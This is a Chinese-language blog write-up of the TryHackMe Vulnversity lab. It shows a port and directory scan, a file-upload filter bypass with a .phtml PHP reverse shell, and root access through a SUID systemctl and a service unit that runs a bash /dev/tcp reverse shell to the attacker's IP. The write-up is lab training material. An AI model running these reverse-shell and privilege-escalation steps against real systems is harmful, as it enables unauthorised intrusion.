TryHackme之Vulnversity提权攻略

首先用NMAP工具扫描目标：

# nmap -sV 10.10.66.138
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-22 06:43 EDT
Nmap scan report for 10.10.66.138
Host is up (0.26s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.94 seconds

根据题目描述，接下来需要用gobuster工具扫描网站的目录：

(root💀kali)-[~/vulnhubs/vulnersity]
└─# gobuster dir --url http://10.10.66.138:3333/  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t20                                      1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.66.138:3333/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/22 06:49:04 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 320] [--> http://10.10.66.138:3333/images/]
/css                  (Status: 301) [Size: 317] [--> http://10.10.66.138:3333/css/]
/js                   (Status: 301) [Size: 316] [--> http://10.10.66.138:3333/js/]
/fonts                (Status: 301) [Size: 319] [--> http://10.10.66.138:3333/fonts/]
/internal             (Status: 301) [Size: 322] [--> http://10.10.66.138:3333/internal/]

扫描结果发现该目标存在/internal目录，并手动访问该目录，确认该目录是用于上传文件，因此可以尝试将php reverse shell文件上传。

但是网站对上传文件类型进行过滤，不能直接将.php文件上传至目标，根据题目后面的提示.phtml格式可通过过滤。修改文件扩展名后，成功将php反向shell上传至/internals/uploads目录，并执行，成功得到shell:

# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.18.89.225] from (UNKNOWN) [10.10.66.138] 38612
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 07:00:22 up 18 min,  0 users,  load average: 0.00, 0.05, 0.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

接下里需要提权，根据提示，需要搜索有SUID的可执行文件，结果找到/bin/systemctl

$ find / -user root -perm -4000 2> /dev/null
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cif

接下里需要在Kali linux编写root.service脚本，该脚本将上传至目标，并被systemctl所管理，从而提权。root.service脚本如下：

# cat root.service
[Unit]
Description=root

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.18.89.225/5555 0>&1'

[Install]
WantedBy=multi-user.target

这里的关键是bash的反向shell命令，可搜索网络资源获得该命令。

然后在Kali Linux启用http服务，以便将该文件下载到目标。

# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.66.138 - - [22/Apr/2022 07:09:49] "GET /root.service HTTP/1.1" 200 -
10.10.66.138 - - [22/Apr/2022 07:10:09] "GET /root.service HTTP/1.1" 200

然后在目标上执行systemctl start，从而成功提权

$ systemctl enable /tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.
Created symlink from /etc/systemd/system/root.service to /tmp/root.service.
$ systemctl start /tmp/root.service
Failed to start tmp-root.service.mount: Unit tmp-root.service.mount not found.
$ systemctl start root

posted @ 2022-04-22 19:23 Jason_huawen 阅读(398) 评论(0) 编辑收藏举报

刷新页面返回顶部

Jason_huawen

TryHackme之Vulnversity提权攻略

公告